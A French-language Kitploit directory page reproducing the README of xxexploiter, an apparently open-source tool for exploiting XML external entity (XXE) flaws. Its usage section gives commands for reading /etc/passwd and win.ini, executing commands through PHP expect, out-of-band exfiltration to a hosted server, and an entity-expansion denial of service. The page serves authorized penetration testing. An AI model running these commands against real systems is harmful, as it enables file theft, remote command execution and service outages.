Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
xxexploiter — Outil pour aider à exploiter les vulnérabilités XXE | Kitploit
Outils/GitHubGitHub/luisfontes19/xxexploiter
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebFuzzing
GitHubluisfontes19/xxexploiter

xxexploiter

Outil pour aider à exploiter les vulnérabilités XXE

Voir le dépôt
61570il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

XXExploiter

Build codecov Known Vulnerabilities License: MIT

XXExploiter

Il génère les charges utiles XML et démarre automatiquement un serveur pour servir les DTD nécessaires ou effectuer l'exfiltration de données.

Installation

root@kitploit:~
#install node and npm if you don't have it yet 
npm install -g xxexploiter

Compilation et exécution à partir des sources

Il s'agit d'une simple application Node écrite en TypeScript. Vous pouvez donc la compiler comme toute autre application : (installez d'abord node et npm, si vous ne les avez pas)

root@kitploit:~
npm install  
npm run build  
#you may need to npm install typescript -g in order for 'npm build' to succeed 

Pour exécuter l'application, vous pouvez le faire de 3 façons :

root@kitploit:~
npm start [args]  
node dist/index.js [args]  
npm link #and now just call xxexploiter

Ou vous pouvez l'installer sur votre système :

root@kitploit:~
npm link

Utilisation

root@kitploit:~
Usage: xxexploiter [command] [options]

Commands:
  xxexploiter file [file_to_read]  Use XXE to do a request
  xxexploiter request [URL]        Use XXE to do a request
  xxexploiter expect [command]     Use XXE to execute a command through PHP's expect
  xxexploiter xee [expantions]     Generate a huge content by resolving entities

Fuzzing Specific Options
  -w, --wordlist        Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
                        for the magic.
  -y, --success-string  String to search for a success response in the requests. Not usefull for blind attacks
  -n, --error-string    String to search for an error response in the request. Not usefull for blind attacks

Options:
  --version             Show version number                                                                    [boolean]
  -s, --server          Server address for OOB and DTD
  -p, --port            Server port for OOB and DTDs. Default: 7777
  -t, --template        path to an XML template where to inject payload
  -m, --mode            Extraction Mode: xml, oob, cdata. Default: xml
  -e, --encode          Extraction Encoding: none, phpbase64. Default: none
  -o, --output          Output for the XML payload file. Default is to console
  -x                    Use a request to automatically send the xml file
  -X, --request-output  Output the response from -x option. If not defined goes to stdout
  --verbose             Enable some messages help for understanding whats happening
  --doctype             Specify the name of the doctype to be injected. Default is xxexploiter
  -h, --help            Show help                                                                              [boolean]

Examples:
  xxexploiter expect ls
  xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml
  xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob
  xxexploiter xee 900000000 -o output.xml
  xxexploiter file /etc/passwd -x request.txt -t template.xml
  xxexploiter file /root/{FUZZ} -w wordlist.txt -n "not found" -x request.txt

Extra Info:
  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to
  be injected
  - When specifiying file paths for windows use forward slash.
  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
  Usefull with blind attacks
  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
  cdata
  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
  - When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
  or an expected success string

Exemples

Génération simple de charge utile

asciicast

Automatisation de la requête pour envoyer la charge utile

asciicast

Extraction OOB avec requête automatisée

asciicast

Fuzzing

asciicast

Remarques :

Si vous choisissez d'utiliser le mode OOB ou CDATA, XXExploiter générera le DTD nécessaire à inclure et démarrera un serveur pour les héberger. Gardez à l'esprit que si vous utilisez ces options, vous devez définir l'adresse du serveur.

Si vous incluez du contenu dans le corps du XML, sachez que les caractères réservés du XML comme '<' peuvent casser l'analyse, alors assurez-vous d'utiliser CDATA ou le base64encode de PHP.

La plupart des langages limitent le nombre d'expansions d'entités ou la longueur totale du contenu développé, alors assurez-vous de tester d'abord XEE sur votre machine, dans les mêmes conditions que la cible.

Télécharger l’outil